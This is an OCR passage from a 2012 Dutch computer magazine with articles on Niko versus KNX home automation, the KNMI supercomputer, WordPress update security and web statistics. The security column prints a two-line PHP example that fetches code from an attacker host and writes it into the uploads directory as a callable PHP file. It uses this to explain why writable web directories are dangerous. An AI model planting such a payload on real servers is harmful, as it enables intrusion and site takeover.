Goedkoper dan KNX in de zin dat het systeem eenvoudiger - dus sneller - geprogrammeerd kan worden. Ook zorgt de filosofie (zoveel mogelijk centraal) ervoor dat er minder losse componenten nodig zijn. Alles wordt aangestuurd door de verdeler. Prijstechnisch zit Niko zeker aan de goede kant van de streep: degelijke designproducten voor een scherpe prijs.
Een KNX-installatie kan goedkoper en duurder zijn dan Niko. Goedkoper omdat KNX meer flexibiliteit biedt in de infrastructuur. Duurder omdat - soms - diepgaande kennis van de programmeertaal ETS vereist is. Niet alle leveranciers leveren een toegankelijke programmeerinterface. Bijkomend voordeel van KNX is keuzevrijheid, onder meer voor goedkopere componenten.
Toekomstbestendigheid
Solide basis in België en het marktaandeel in Nederland groeit. Niko blijft producten ontwikkelen en ondersteunt met softwareupdates.
Standaard met toonaangevende spelers die gebaat zijn bij vooruitgang én samenwerking. Valt een leverancier weg, dan blijft de standaard bestaan.
Tabel 1: Niko en KNX – de voordelen
PC-ACTIVE | Nr. 262 – 2012
Huis van de toekomst.indd 73
73
9/6/12 4:37 PM
| Doe-het-zelf domotica
HARDWARE
domotica met scènes, vooraf geprogrammeerde leef scenario’s zoals een boek lezen, een maaltijd bereiden in de keuken, eten aan de eettafel, televisie kijken, een film kijken, muziek luisteren, een romantische avond op de bank of een schilderij ophangen (met het licht op volle sterkte)… Aan de hand van de wensen van de bewoner wordt bepaald hoe de infrastructuur in elkaar steekt. Het resultaat: in de muur komt gewoon een eenvoudige aan-uitschakelaar. Het daadwerkelijk dimmen gebeurt op een andere plek en wordt door middel van visualisering aangestuurd op een client zoals een iPad, smartphone of touchscreen op de muur.
Uitbreidbaarheid Inmiddels kijk ik nu anders naar domotica en is de techniek inderdaad ondergeschikt aan wat ik wil. Over de bedrijfszekerheid van beide platforms mag geen twijfel bestaan. Het moet werken. Punt. De uitbreidbaardheid is ook belangrijk. Hier heeft KNX toegevoegde waarde. Zo wil ik graag aan de slag met centraal aangestuurde audio en video op verschil lende plekken in het huis. Bij wijze van spreken zou ik op het toilet een bewe gingsmelder plaatsen. Bij binnenkomst gaat het licht automatisch aan en klinkt er door een verborgen speaker het geluid van een rustgevende waterval. Bij een druk op de knop - voorheen lichtschakelaar
- wordt automatisch een andere audiotrack geselec teerd, bijvoorbeeld het opzwepende Ritt der Walküren van Wagner, mocht ‘een grote boodschap’ zich aan dienen. De wensen vertalen zich naar een keuze. Het gesloten karakter van Niko biedt beperkte mogelijkheden; dat is inherent aan de filosofie. Het voordeel is ook een nadeel. KNX is open, oneindig uitbreidbaar en sluit meer aan bij mijn persoonlijke wensen. Een mooi voorbeeld is Bwired, een huis dat afgeladen is met domotica en - publiekelijk! - inzicht biedt in de status. Van mensen die aanbellen tot de telefoongeschiede nis, de temperatuur in huis en het verbruik van gas, water en licht. Zo extreem hoeft het wat ons betreft niet, maar het is wel goed om te weten dat het kan. In dat opzicht is KNX in ons specifieke geval de beste keuze. Deze keuze doet overigens niets af aan het geen Niko biedt. Dat is net een zeer betaalbare variant van het Appleconcept. En ja, ook ik heb een Apple-notebook en zou nooit meer zonder willen. Alleen voor het betere sleu telwerk gebruik ik liever een Windows-pc. Oneindig uitbreiden in de toekomst wint het van de prijs, de verleiding is te groot… Ik kies voor KNX. Als mijn echtgenote de knoop door zou mogen hakken, dan zou het Niko worden. Alleen is de democratie in huize Kamphuis op het gebied van ICT - nog - niet ingevoerd. Het wordt KNX.
Nadelen
Niko
KNX
Installatie
Bij bestaande woningen vereist Niko een stevige aanpassing van de infrastructuur met nieuwe bedrading en beperkte draadloze functionaliteit.
KNX-producten spreken wel dezelfde taal, maar installatie is niet altijd even eenvoudig. Er zijn véél meer variabelen.
Uitbreidbaarheid
Niko is beperkt tot toepassingen in en rondom het huis. Voor audio en video bent u aangewezen op andere oplossingen. Die kunnen overigens wel samenwerken met Niko.
De uitbreidbaarheid is ook de achilleshiel van KNX. Zoveel mensen, zoveel wensen. In theorie werkt alles naadloos samen, maar dat vereist wel veel kennis en ervaring.
Aanpassen (flexibiliteit)
Niko is zeer eenvoudig naar uw wensen aan te passen. Voor grote veranderingen bent u wel aangewezen op een installateur
De KNX-basis kunt u zelf aanpassen, maar voor ingrijpende wijzigingen moet u ook hier een installateur inschakelen.
Design
Niko heeft een breed assortiment, maar blijft beperkt tot het eigen aanbod. Als u bijvoorbeeld al schakelmateriaal van een merk in huis hebt, dan wijkt Niko af als u slechts een deel vervangt.
KNX heeft een breed scala aan producten (keuzestress!). In de praktijk kiezen mensen toch vaak voor producten van één leverancier. Bij sommige leveranciers is dat kostbaar.
Bedrijfszekerheid
Niko is behoorlijk idiot-proof en robuust, een vereiste bij thuisautomatisering. Tegelijkertijd verdwijnt ook de charme van het ‘zelf doen’. Maar voor de meeste mensen staat bedrijfszekerheid op één.
Een goede installatie werkt feilloos, maar mensen willen altijd meer. Bij KNX is de verleiding groot om uit te breiden (‘knutselen’) en neemt de kans op ‘ongelukjes’ toe.
Prijs
Qua prijs is een Niko-basisinstallatie goedkoper dan hetzelfde van KNX, al is moeilijk vast te stellen hoeveel. De prijs is sterk afhankelijk van de installateur. De eenvoudige modulaire uitbreidbaarheid drukt bij Niko de kosten. Nadeel is wel dat de kosten voor het aanpassen van de infrastructuur hoger uitvallen bij bestaande bouw.
Er is concurrentie onder leveranciers die bij KNX zijn aangesloten. Dat heeft een uitwerking op de prijs, maar tegelijkertijd wordt gewerkt met installateurs die KNX-gecertificeerd moeten zijn en zelf de opleidingskosten betalen. Dit vertaalt zich naar hogere installatiekosten. Ook zijn losse KNX-componenten duurder.
Toekomstbestendigheid
Niko kan over de kop gaan en dan stopt de ondersteuning. Na verloop van tijd zit u dan met een installatie waar u geen vervangende onderdelen en ondersteuning meer voor kunt krijgen. Daar staat tegenover dat er altijd partijen zijn die Niko over willen nemen om te profiteren van de ontwikkelde kennis. Voorlopig staat Niko als een huis.
KNX is gestandaardiseerd volgens de Europese EN50090-norm, een bindende factor. Maar… de deelnemers zijn concurrenten. Ontstaat er onenigheid of een afwijkende visie, dan kan KNX uiteenvallen in substandaarden en ontstaat strijd à la Betamax versus Video 2000 versus VHS. Vooralsnog is dat zeer onwaarschijnlijk.
Tabel 2: Niko en KNX – de nadelen
74
PC-ACTIVE | Nr. 262 – 2012
Huis van de toekomst.indd 74
9/6/12 4:38 PM
DE SUPER-BULL VAN HET KNMI
RAZENDSNEL HET WEER VOORSPELLEN TEKST : RONALD SMIT
Qua uiterlijk lijkt hij zo weggelopen uit een sciencefictionfilm, maar dat is vooral te danken aan de combinatie van zeer kunstzinnige deuren en een batterij aan knipperende led’jes. We hebben het over de nieuwe razendsnelle supercomputer van het KNMI, die weersvoorspellingen gedetailleerder dan ooit moet berekenen.
H
et is echt een verademing om eens een keer geen saaie zwarte systeemracks te zien, maar een mooi kunststukje van aluminium deuren die een neuraal netwerk voorstellen. Cadeautje van fabrikant Bull voor het Koninklijk Nederlands Meteorologisch Instituut, beter bekend als het KNMI, als extraatje bij de bestelling van de razendsnelle BullX blade cluster. Zoals de naam al doet vermoeden, is deze supercomputer opgebouwd uit een cluster van losse systemen die via een razendsnelle verbinding onderling met elkaar zijn verbonden. De computer telt maar liefst 396 blades. Zo’n kleine, maar complete computermodule is eigenlijk een pc op een insteekkaart, met een eigen harde schijf. Dat heeft als voordeel dat zo’n unit heel compact kan blijven en door een aantal van deze blades op een gezamenlijke print te prikken - een beetje vergelijkbaar met de PCIslots op een gewoon moederbord - ontstaat een cluster van verschillende systeemborden die onderling
76
razendsnel gegevens kunnen uitwisselen, maar ook onderdelen als een voeding delen.
Tot veertig blade chassis Zo’n cluster wordt een BullX blade chassis genoemd. Die kan achttien van deze dual socket blades huisvesten. Het huidige systeem bevat 22 van deze BullX blade chassis en is uit te breiden tot een systeem met veertig exemplaren. Elke blade is voorzien van twee Intel Xeon 5675-hexacore-processors draaiend op een kloksnelheid van 3,06 GHz. Elke CPU is voorzien van zes processorkernen, ofwel twaalf cores per blade, waarmee we op een totaal van 4752 exemplaren uitkomen. En om het plaatje helemaal compleet te maken: iedere blade-module beschikt over 24 GB RAM, wat voor het hele systeem een totaal werkgeheugen oplevert van 9,5 Terabyte! Elke afzonderlijke BullX B500 blade is geoptimaliseerd voor snelheid. Dat begint bij het kloppend hart in de vorm van het processorkoppeltje, bestaande uit
PC-ACTIVE | Nr. 261 – 2012
KNMI-computer.indd 76
9/6/12 12:52 PM
KNMI COMPUTER
tweemaal een Intel Xeon X5676 voorzien van zes cores en twaalf threads. Het 24 GB DDR3-geheugen is voorzien van Error Correction Code ofwel ECC Pariteitscontrole, waardoor geheugenfouten feitelijk zijn uitgesloten. Mocht een klant het geheugen ooit eens willen uitbreiden, dan is dat dankzij twaalf geheugenslots geen probleem. Verder is er in de blade module zélf plek voor een SATA-schijf met een maximale opslagcapaciteit van 250 GB, of een 120 GB Solid-State Drive.
Stevig! Het gros van de onderdelen in de blade is weliswaar van het kaliber ‘stevig’, maar voor de meeste mensen nog prima als zodanig te herkennen. Sterker nog: een beetje handige jongen zou er met wat geduld best een leuk webservertje van kunnen maken. Maar de ConnectX-adapter maakt de blade uniek ten opzichte van welke standaard-pc dan ook. Deze is eenkanaals QDR - ofwel Quadruple Data Rate - Infinibandcompatibel; via dit onderdeel wordt een razendsnelle communicatie mogelijk van 40 Gbit/s. Infiniband zou echter nog veel rapper kunnen, tot wel 300 Gbit/s. In veel gevallen is dit soort extreme snelheden helemaal niet nodig, want elke blade draait zijn eigen deeltaak en wisselt continu data uit over een grote hoeveelheid andere modulen in het cluster van blades. Om dat allemaal zo goed en geordend mogelijk te laten lopen, heeft het KNMI gekozen voor de open source job scheduler - ofwel taakverdeler - SLURM.
| HARDWARE
Dat staat voor Simple Linux Utility for Resource Management en biedt drie belangrijke functies. Allereerst kan het systeem exclusief of juist nietexclusief taken toewijzen aan afzonderlijke blades. Daarnaast vormt SLURM een kader voor het starten, uitvoeren en monitoren van parallelle taken, jobs in vakjargon geheten. Tot slot wordt gezorgd voor een optimale reservering van blades in een cluster voor parallelle jobs. Samengevat kunnen we stellen dat SLURM vooral is bedoeld voor het beheren en stroomlijnen van alle software die binnen een blade draait. Omdat supercomputers in essentie uit een enorme hoeveelheid losse, onderling verbonden blades zijn opgebouwd, begonnen ontwerpers in het begin van de jaren negentig na te denken over een voor programmeurs praktische manier om het geheel overzichtelijk te kunnen behapstukken. Daarvoor werd MPI, Message Passing Interface, in het leven geroepen. De inmiddels tot standaard uitgegroeide techniek biedt een programmeur een aantal essentiële voorzieningen, waaronder communicatie tussen lopende processen op de diverse blade-processors.
Atoomschuilkelder In De Bilt is het systeem opgesteld in een gloednieuw datacenter, dat zich bevindt in een oude atoomschuilkelder onder het instituut. Bij het KNMI wordt de nieuwe aanwinst - uiteraard!- gebruikt voor weersvoorspellingen: van extreem gedetailleerde 48uurs prognoses tot complete klimaatmodellen.
De architectuur van de supercomputer. De afkortingen staan voor: • mgt = management node, regelt alles rondom het cluster; de verkeersregelaar. • HN = head node, node waar gebruikers op inloggen, compileren en jobs afschieten. • FSN = file server node, zitten diskbanken achter, exporteren alle filesystemen over Infiniband.
PC-ACTIVE | Nr. 261 – 2012
KNMI-computer.indd 77
77
9/6/12 12:52 PM
Knmi computer
Diverse gebruikers kunnen gelijktijdig gebruikmaken van de Bull, wat heel efficiënt is. De vraag die natuurlijk vooral opborrelt, is wat het nieuwe systeem echt aan rekenwinst oplevert in vergelijking met zijn voorgangers. Nou, dat is niet niks: allereerst zijn rekenmodellen tot vier keer sneller door te rekenen, maar ook de nauwkeurigheid is fors toegenomen.
Sneller en beter Het oude en nieuwe weermodel heten respectievelijk HIRLAM en HARMONIE. De berekeningen van het nieuwe model, die als programma op de supercomputer draait, maken een veel nauwkeuriger voorspelling mogelijk. Deze 19-uurs voorspelling blijkt vaak exact te kloppen, terwijl het oude model zijn werk veel minder netjes afleverde. HARMONIE maakt volop gebruik van de extra rekenkracht die uit de nieuwe super-pc kan worden gehaald. Ook kan er op het nieuwe systeem veel kleinschaliger worden gerekend. Modelexpert Sander Tijm benadrukt echter dat het weer zelfs met al deze rekenpower nog altijd niet honderd procent nauwkeurig is te voorspellen, zelfs niet op de korte termijn. “We zitten nu met mistbanken op de Noordzee, die opduiken terwijl ze er eigenlijk niet horen te zijn.”
Blokjesdenken HARMONIE stelt een weersverwachting samen door de lucht boven - bijvoorbeeld - Nederland in kleine blokjes van circa zes vierkante kilometer op te delen. Deze kubussen hebben een dikte van ongeveer twintig meter vlak bij de grond tot meer dan vijfhonderd meter op tien kilometer hoogte. In één zo’n blokje worden dan de luchtstromingen berekend, maar omdat één kubus ook weer is voorzien van acht buurblokjes, moeten de rekengegevens daarmee onderling worden uitgewisseld. En die blokken bevatten op hun beurt óók weer buren, zodat al snel een zeer complex geheel ontstaat, dat met de hand niet meer is te berekenen. Eén van de voordelen van dit model is dat het ook mogelijk is om extreem lokale voorspellingen te doen door de berekeningen van een deelblokje simpelweg apart te bekijken. Dat is weer ideaal voor bijvoorbeeld organisatoren van evenementen of de luchtvaart.
Koeling De supercomputer genereert behoorlijk wat warmte, en die moet uiteraard worden afgevoerd. In de serverruimte zelf is het dan ook een herrie van belang door de vele enthousiast draaiende ventilatoren; elke blade heeft er minstens één. Tel daarbij ook de fans van de voedingen en koeldeuren alsmede de batterij aan draaiende harde schijven op en u snapt dat het daar een enorm lawaai is. Geluiddichte deuren bieden gelukkig uitkomst, maar de warmte is zelfs ondanks al dit geweld nog lang niet weg. Om echt effectief te koelen wordt een extern
| Hardware
Noodstroom Omdat het weer ook doorgaat tijdens een stroomstoring, is in de kelder voorzien in een noodstroomvoorziening. Deze bestaat uit een stevige twaalfcilinder dieselgenerator die dankzij voorverwarming altijd stand-by staat. Omdat de diesel niet in een halve seconde opstart, staat er ook een groot en zwaar vliegwiel, dat altijd op toeren wordt gehouden. Valt de elektriciteit uit, dan levert dit wiel gekoppeld aan de dynamo genoeg energie voor vijftien seconden. Dat is voldoende om de diesel te starten. Zodra deze op toeren is, wordt de dynamo daaraan gekoppeld en kan het KNMI voor een paar dagen zelf elektriciteit opwekken. Langer is ook mogelijk, maar dan moet de dieseltank buiten worden bijgevuld.
koelsysteem gebruikt dat koude lucht aanvoert en warme lucht afvoert. Die koude lucht wordt in de zomer geproduceerd met koud grondwater. Simpel, effectief en in principe milieuvriendelijk is dat. In principe, want het is verboden om grondwater te verwarmen, wat natuurlijk wel gebeurt als er koud water wordt opgepompt en warmer water wordt teruggestopt. Wettelijk is dan ook bepaald dat er koud grondwater mag worden onttrokken en warmer water toegevoerd, mits de jaarbalans qua watertemperatuur op nul staat. In de koudere maanden zet het KNMI daarom koeltorens op het dak in, waaruit het water wordt gebruikt om de computers te koelen én grondwater weer netjes op temperatuur te brengen. En ook die koeltorens werken heel milieuvriendelijk. Via een raster, waardoorheen de buitenlucht blaast, druppelt langzaam water naar beneden. Zo ontstaat een zeer efficiënte koeling, vergelijkbaar met de radiator in een auto. Ook bij de Bull zelf treffen we in het achterpaneel een dergelijke radiator aan. Daar stroomt het koude water doorheen en ventilatoren blazen de door de computer opgewarmde lucht door de radiator, waar de lucht weer afkoelt, zodat een continue koude luchtstroom de computeronderdelen ingaat.
Overzicht De BullX blade cluster is een indrukwekkende machine, maar er is nog steeds makkelijk de basisopbouw van een standaardcomputer in terug te zien. Ten eerste is er de processorunit, bestaande uit stapels blade-modules. Een kast verder zien we een grote hoeveelheid hardeschijfmodulen. Elk exemplaar bevat een 600 GB-schijf en dat levert uiteindelijk een totale opslagcapaciteit van 60 Terabyte op. Naast de opslagmodule is er dan nog de voeding en een razendsnelle interconnect switch. Deze laatste is nodig om de blades snel met elkaar te laten communiceren. Een standaard netwerkverbinding volstaat dan niet en dus is hiervoor uitgeweken naar InfiniBand QDR, een highendoplossing waarbij elk thuisnetwerk verbleekt. En zo blijkt het mogelijk uit redelijk ‘standaard’ onderdelen een echte supercomputer samen te stellen.
PC-ACTIVE | Nr. 261 – 2012
KNMI-computer.indd 79
79
9/6/12 12:52 PM
Het Lab tekst : henk van de k amer henk @ he tl ab . tk
Het beveiligen van een website is verre van eenvoudig. Uiteraard is de eerste stap het up-to-date houden, maar wat als we daardoor andere gaten in de beveiliging slaan? Deze maand mijn bedenkingen over de automatische updatefunctie van WordPress.
WordPress updaten Het continu updaten van programma’s op onze bureaucomputer zijn we ondertussen wel gewend. Doet u dat niet, dan is de kans groot dat binnen een maand een kwaardaardig virus gebruikmaakt van uw laksheid. Exact hetzelfde geldt voor uw website. Mogelijk dat u het niet zelf hoeft te doen, maar in dat geval is uw provider er de hele tijd mee bezig. En alhoewel de meesten onder ons dit niet actief doen, geldt eenzelfde verhaal voor bijvoorbeeld uw mobiele telefoon of router. Software zonder bugs bestaat niet en elke fout kan worden misbruikt om het apparaat over te nemen en te misbruiken voor andere doelen dan waarvoor u het ooit hebt aangeschaft.
Schrijfrechten Vaste lezers van deze rubriek weten dat ik een serie servers onderhoud voor klanten. Bovenstaande verhaal vertel ik dus regelmatig, maar desondanks gaat het wel eens mis. In zo’n geval weet een kwaadwillende een stukje script op de webserver binnen te sluizen en meestal is daarvoor een beschrijfbare directory nodig. Laten we het iets concreter maken. Uit ervaring weet ik dat veel klanten graag plaatjes of documenten via een webinterface willen uploaden. Dat dit veel veiliger kan buiten de website om is meestal tegen dovemansoren gezegd. Waarom uploaden via een website gevaarlijk is? Een webserver - ook onder Windows of op de Mac - draait altijd onder een bepaald account en die hebben nu eenmaal rechten om dingen op de server te doen. Neem bijvoorbeeld de webserver achter Het Lab [1], de site die bij deze rubriek hoort. Deze draait onder het www-account. Iedere bezoeker van Het Lab heeft dus de lees- en schrijfrechten die gebruiker www heeft. De leesrechten zijn logisch; tenslotte moeten plaatjes
80
Het Lab.indd 80
en PHP-code worden ingelezen en uiteindelijk via het netwerk naar de bezoeker worden verzonden. De schrijfrechten zijn wellicht minder duidelijk. Maar stel nu dat ik als beheerder van de website de plaatjes via het beheerdersdeel zou willen uploaden. In dat geval moet de directory waarin de bestanden terechtkomen, beschrijfbaar zijn voor gebruiker www. En daarmee heeft dan de hele wereld - lees: alle bezoekers - automatisch schrijfrechten op mijn server!
Beveiliging Voordat een paar lezers in de pen klimmen, ja, het gaat echt om iedereen. Het uploaden zit inderdaad verstopt in het admin-panel van WordPress. Als deze software correct controleert of een beheerder is ingelogd, lijkt het alsof gewone gebruikers niets kunnen. Echter, we praten over fouten in software. Stel dat daarmee de inlogbeveiliging wordt omzeild. Of dat u via zo’n fout op mijn webserver een stukje code kunt laten uitvoeren: $code = file_get_contents('http://www. inbreken.com/code.txt'); file_put_contents('wp-content/uploads/ inbreken.php', $code); Deze regels downloaden een bestand met kwaadaardige code van de server van de inbreker en zetten deze op mijn server. Daarna kan deze code worden aangeroepen door te surfen naar: http://www.hetlab.tk/wp-content/uploads/ inbreken.php Dit is allemaal mogelijk, doordat gebruiker www niets in de weg wordt gelegd. Gelukkig heeft mijn eigen server geen beschrijfbare directory die is te
PC-ACTIVE | Nr. 262 – 2012
9/6/12 1:00 PM
HET LAB
| Algemeen
Listing 1 'ssh-rsa'); $connection = ssh2_connect('localhost', 22, $methods); if (ssh2_auth_pubkey_file($connection, 'hvdkamer', $pubkey, $prvkey, '')) { echo "Inloggen via SSH is gelukt\n"; } else { echo "Inloggen via SSH is mislukt\n"); } ?>
bereiken vanuit de root van mijn website. Daarmee kan gebruiker www de inhoud niet wegschrijven op een plaats die via een HTTP-aanroep weer kan worden opgevraagd. Zoals gezegd is een aantal klanten niet zo streng voor zichzelf en hebben zij wel zo’n directory. Sterker nog, op het internet staan tig mensen te blaten dat u gewoon 777 rechten - lees: de hele wereld mag alles overschrijven - moet instellen als iets niet werkt. Wie dat soort adviezen klakkeloos uitvoert, vraagt om ellende... De afgelopen jaren heb ik diverse keren een klant gehad met een zogenoemde defaced website. De normale openingspagina is dan vervangen door een boodschap van een hacker. En tot op heden bleek elke keer dat een directory met schrijfrechten voor gebruiker www de boosdoener was. Uiteraard kan het ook zonder, maar dat is gewoon een brug te ver voor de meeste scriptkiddies die het een sport vinden om websites te bekladden. Zij speuren het internet af naar software met bugs en gaan ervan uit dat iedereen in het geval van WordPress braaf een beschrijfbare uploads directory zal hebben. Dat wordt tenslotte geadviseerd in de documentatie. Wie van dit soort standaarden afwijkt, is meteen een heel stuk veiliger. Met inderdaad een wat bewerkelijker route om zelf de beveiliging te omzeilen, maar dat hoort er gewoon bij.
Updaten Oké, het mag duidelijk zijn dat beschrijfbare directories binnen de web-root - alleen die zijn via een HTTP-aanroep direct opvraagbaar - gevaarlijk zijn. Aan de andere kant is het niet-doorvoeren van updates dat ook. Voor het updaten zijn natuurlijk schrijfrechten noodzakelijk; u moet tenslotte bestanden vervangen. Dat zorgt voor een enorme spagaat in de automatische updatefunctie die WordPress heeft. Deze functionaliteit zit tenslotte achter een webpagina, ofwel wordt uitgevoerd door gebruiker www. Om de automatische update te laten werken, moet u niet alleen een beschrijfbare uploads directory hebben, maar moet de complete web-root beschrijfbaar zijn!
Bovenstaande ‘oplossing’ is wat mij betreft een nachtmerrie. Persoonlijk denk ik dat een iets verouderde WordPress over het algemeen veiliger zal zijn dan schrijfrechten voor gebruiker www in de webroot. Zeker als u ook nog andere software op uw website gebruikt. Een tussenoplossing kan zijn dat u via een remote shell inlogt en tijdelijk de schrijfrechten aanzet. Maar als u al op dat punt bent aanbeland, is het veel gemakkelijker om WordPress via deze route te updaten: $ cd /var/www/hetlab.tk/www $ mkdir tmp $ mv wp-con* tmp/ $ rm -r wp-* index.php xmlrpc.php license. txt readme.html $ wget http://wordpress.org/latest.tar.gz $ tar -xzf latest.tar.gz $ mv wordpress/* . $ rm -r wp-content/ $ mv tmp/* . $ rm -r tmp/ wordpress/ latest.tar.gz Inderdaad, het updaten komt gewoon neer op het verwijderen van alle oude bestanden (vierde regel) en een nieuw archief uitpakken (vijfde regel). De tweede en derde opdracht stellen de wp-content directory en het bestand wp-config.php veilig. In de eerste staan de door ons geïnstalleerde plug-ins en themes en de tweede bevat onze configuratie. Op deze manier worden de standaard themes en plugins van WordPress niet geüpdatet, maar persoonlijk verwijder ik deze meteen. Na het uitpakken van het archief zetten we onze eigen bestanden weer terug en ruimen we de tijdelijke bestanden op. De commando’s zien er misschien complex uit, maar ze kunnen ook prima worden geautomatiseerd in een Bash-script.
SSH-module Door in te loggen met SSH word ik op mijn server gebruiker hvdkamer en het mag duidelijk zijn dat ik de website mag aanpassen. Dat is ook de reden dat bovenstaande commando’s werken. En daarmee hebben we een mogelijke oplossing voor ons dilemma.
PC-ACTIVE | Nr. 262 – 2012
Het Lab.indd 81
81
9/6/12 1:00 PM
ALGEMEEN
| HET LAB
Want er is een SSH-module [2] beschikbaar. WordPress kan deze gebruiken, zoals u in Figuur 1 kunt zien. Het aanmaken van het benodigde sleutelpaar kan zo: asterix:~$ ssh-keygen -b 2048 -f ~/.ssh/ wordpress -t rsa -N '' De -b 2048 zorgt voor deze hoeveelheid bits, de -f geeft een bestandsnaam op, de -t het soort sleutel en de -N tenslotte een wachtwoord. Op dat laatste komen we straks nog terug; voorlopig hebben we het geheel even zonder aangemaakt. Na afloop hebben we een tweetal bestanden: wordpress met daarin het geheime deel van onze sleutel en een wordpress.pub met het publieke deel. Helaas werkten de instellingen in Figuur 1 niet. Waarom is onduidelijk, omdat WordPress standaard alle foutmeldingen onderdrukt. Deze aanzetten via wp-config.php heeft bij mij nog nooit gewerkt, dus besloot ik om zelf even een testpagina te maken; zie Listing 1. De testpagina gaf aan dat het maken van de verbinding was mislukt. In de logs ontdekte ik de oorzaak: /home/ hvdkamer is dankzij de open_basedir instelling niet op te vragen. Ondertussen mag duidelijk zijn dat PHP enorm krachtig is, ook via een beperkte gebruiker als www. Om die reden hebben de makers een beperking ingebouwd in waar wel en niet bestanden mogen worden gelezen. Op mijn server Asterix is dat alles binnen /var/www. Daarmee ontstaat een klein probleem. We moeten zorgen dat onze privésleutel niet via een HTTPaanroep is op te vragen. En verder duimen dat er geen bug in WordPress zit, waarmee iemand alsnog bij de inhoud kan komen. Aan de andere kant hebben we dan sowieso een serieus probleem. Omdat ik diverse websites heb, gebruik ik in Lighttpd de mod_evhost als volgt: evhost.path-pattern = "/var/www/%0/%3/" Uw browser geeft in een HTTP/1.1-aanvraag door voor welke website het pakketje is bedoeld. Deze wordt in evhost opgedeeld naar %4.%3.%2.%1 en de %0 is een verkorte versie van %2.%1. Daarmee wordt de aanvraag http://www.hetlab.tk/ dus vertaald naar bestanden in de directory /var/www/hetlab.tk/www. In de /var/www kan ik natuurlijk een sleutels-directory maken, maar wie slim is kan lokaal in zijn of haar hosts-bestand het ip-adres van Asterix koppelen aan de naam sleutels. Waarmee u dan naar http://sleutels/ wordpress kunt surfen en vervolgens onder mijn naam op Asterix kunt komen. Om dat soort ellende te voorkomen - ik kan zelf geen regel bedenken waarmee .ssh zou zijn te bereiken - kunnen we de bestanden beter buiten /var/www houden, zodat in ieder geval Lighttpd ze links laat liggen. Ik heb gekozen voor /home/www en die toegevoegd aan de open_basedir. Zoals gezegd kan PHP in zo’n directory komen, dus mijn eigen home
82
Het Lab.indd 82
Figuur 1: WordPress updaten via SSH
leek mij een minder fijn plan. Nogmaals, we werpen allerlei beveiligingen op in de hoop dat daardoor schade bij een inbraak beperkt blijft. Een volgende test gaf in de PHP-log aan dat de combinatie inlognaam en sleutelpaar ongeldig was. Dat klinkt vaag, maar gelukkig bedacht ik al snel de reden. Om in te loggen met een sleutelpaar moet in de authorized_keys van de gebruiker de publieke sleutel worden opgenomen. Anders zou u doodleuk een sleutelpaar kunnen maken en vervolgens onder mijn naam kunnen inloggen. De oplossing is simpel: cat /home/www/wordpress.pub >> ~/.ssh/ authorized_keys En het testprogramma geeft aan dat alles gelukt is.
WordPress Ook WordPress begint vrolijk aan een herinstallatie wanneer ik daarom vraag. Na een aantal meldingen gebeurt er echter niets meer en is onduidelijk of het nu wel of niet heeft gewerkt. Op dat punt ben ik gestopt, want in bovenstaand verhaal hebt u genoeg beren op de weg gezien, die in ieder geval mij doen afvragen of dit wel de juiste route is. Met name het feit dat een inlogsleutel voor SSH door PHP is op te vragen, vind ik doodeng. Nu kan ik natuurlijk continu het bestand authorized_keys aanpassen om zo de sleutel alleen tijdens updates bruikbaar te laten zijn. Maar als kwaadwillende zou ik daar ook wel een oplossing voor weten. Omdat het geheel inlogt onder mijn naam, zijn veel meer bestanden te benaderen dan gebruiker www kan zien. Ik ga dus gewoon een Bashscript maken met de eerder gegeven commando’s en zo de boel automatiseren. Iets soortgelijks gebruik ik tenslotte ook voor het updaten van phpMyAdmin.
INFOLINK 262019
Voor de voetnoten bij dit artikel: http://www.pc-active.nl/262019
PC-ACTIVE | Nr. 262 – 2012
9/6/12 1:00 PM
ONLINE STATISTIEKEN
| ACHTERGROND
GOOGLE ANALYTICS OF LOGFILES?
METEN IS GISSEN TEKST : DAVID BOELEE
Voor een beheerder is het nuttig om te weten hoeveel verkeer een website genereert. Dat kan door de logfiles van de server te analyseren, of met een online tool als Google Analytics. Maar deze twee methoden geven verschillende uitkomsten. Welke moet u nu geloven?
W
elke methode u ook gebruikt om webstatistieken bij te houden, ze geven allemaal een andere uitkomst. Toch bestaan dergelijke tools al jaren naast elkaar en claimen ze allemaal betrouwbare cijfers te produceren. Terecht, het is niet zo dat bepaalde applicaties aanwijsbaar verkeerde uitkomsten opleveren. Zoals wel vaker met statistieken, is de wijze waarop de cijfers worden verzameld - samen met wat er vervolgens mee wordt gedaan - bepalend voor de uitkomst. De verschillen roepen natuurlijk wel de vraag op welke cijfers het best bruikbaar zijn. We kunnen deze vraag alleen beantwoorden als we weten waar de verschillen vandaan komen. In dit artikel geven we het antwoord aan de hand van twee belangrijke tools: Google Analytics en AWStats. Google is op dit moment verreweg de grootste - en voor marketingdoeleinden de meest gezaghebbende - speler. Ook AWStats is een bekende tool, gratis en open source. Het grote verschil tussen deze twee is de wijze waarop ze gegevens verzamelen. Dat blijkt bepalend voor de uitkomst.
Scripts versus logfile Google Analytics en AWStats werken heel verschillend. De tool van de bekende zoekmachine gebruikt op iedere getoonde pagina een Java-script dat contact legt met de Google-servers. Dit script houdt ver-
volgens bij welke pagina is getoond, wat de link is die wordt aangeklikt, wie de pagina heeft bekeken enzovoort. AWStats is een logfile analyser. Het programma maakt voor het genereren van statistieken gebruik van gegevens uit de logfiles op de server. In deze bestanden staat al het verkeer van en naar de server geregistreerd en een programma als AWStats berekent aan de hand van deze gegevens de gevraagde statistieken. Dat betekent niet dat deze informatie ook betrouwbaardere cijfers oplevert. Een parameter die bijvoorbeeld al snel een vertekend beeld oplevert, is het aantal hits. Sommige beheerders hebben de neiging om op te scheppen over het aantal hits dat hun site in een zekere periode heeft gekregen. Maar het aantal hits heeft betrekking op alle mogelijke bestanden op de server. Alle grafische bestanden leveren een hit op, HTML- en PHP-bestanden eveneens, net als Java-applets enzovoort. U begrijpt: één pagina kan dus al snel resulteren in diverse hits. Staat er op een pagina van een andere site een hotlink naar een afbeelding op uw site, dan zorgt ieder bezoek aan die vreemde pagina voor een hit op uw server. Het aantal hits zegt dus weinig over het aantal mensen dat een site heeft bekeken. Denk daar aan, als u weer eens iemand trots hoort vertellen over het enorme aantal hits dat zijn site scoort. We willen dus vooral weten hoe vaak een bepaalde pagina is bekeken. Als we aan de hand van de logfiles
PC-ACTIVE | Nr. 262 – 2012
Analytics.indd 83
83
9/6/12 1:06 PM
